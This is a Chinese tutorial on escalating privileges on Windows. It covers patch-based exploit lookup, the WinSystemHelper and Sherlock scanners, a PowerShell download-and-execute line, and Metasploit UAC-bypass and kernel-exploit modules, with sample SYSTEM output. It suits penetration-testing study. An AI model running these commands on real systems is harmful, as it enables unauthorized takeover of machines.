一、信息收集
收集本机systeminfo中补丁信息
在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp
查询exp,选择对应的Exp下载运行
https://i.hacking8.com/
https://github.com/SecWiki/windows-kernel-exploits
提权Exp的运行方式,一般有以下几种:
1、直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system
2、在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令
3、利用MSF等工具
4、C++源码,Python脚本,PowerShell脚本等特殊方式
二、WinSystemHelper
使用WinSystemHelper检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测
https://github.com/brianwrf/WinSystemHelper
图片
上传WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行bat查看结果
然后在可利用的Exp中任意下载一个并执行即可
三、Sherlock
Sherlock是在Windows下用于本地提权的PowerShell脚本
分析漏洞出漏洞后利用对应Exp即可
https://github.com/rasta-mouse/Sherlock
图片
启动Powershell
$ powershell.exe -exec bypass
本地加载脚本
$ Import-Module Sherlock.ps1
远程加载脚本
$ IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1’)
检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞
$ Find-AllVulns
四、MSF提权
Getsystem
meterpreter> getsystem
BypassUAC
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
meterpreter> background # 后台session
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>
后台session时会返回session_id,如不清楚可以使用命令sessions -l
msf> run
内核提权
查询补丁
meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010
查询Exp文章来源:https://www.toymoban.com/news/detail-717695.html
msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run
利用示例文章来源地址https://www.toymoban.com/news/detail-717695.html
msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM
五、参考链接
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/brianwrf/WinSystemHelper
https://github.com/rasta-mouse/Sherlock
到了这里,关于Windows提权流程及手法的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!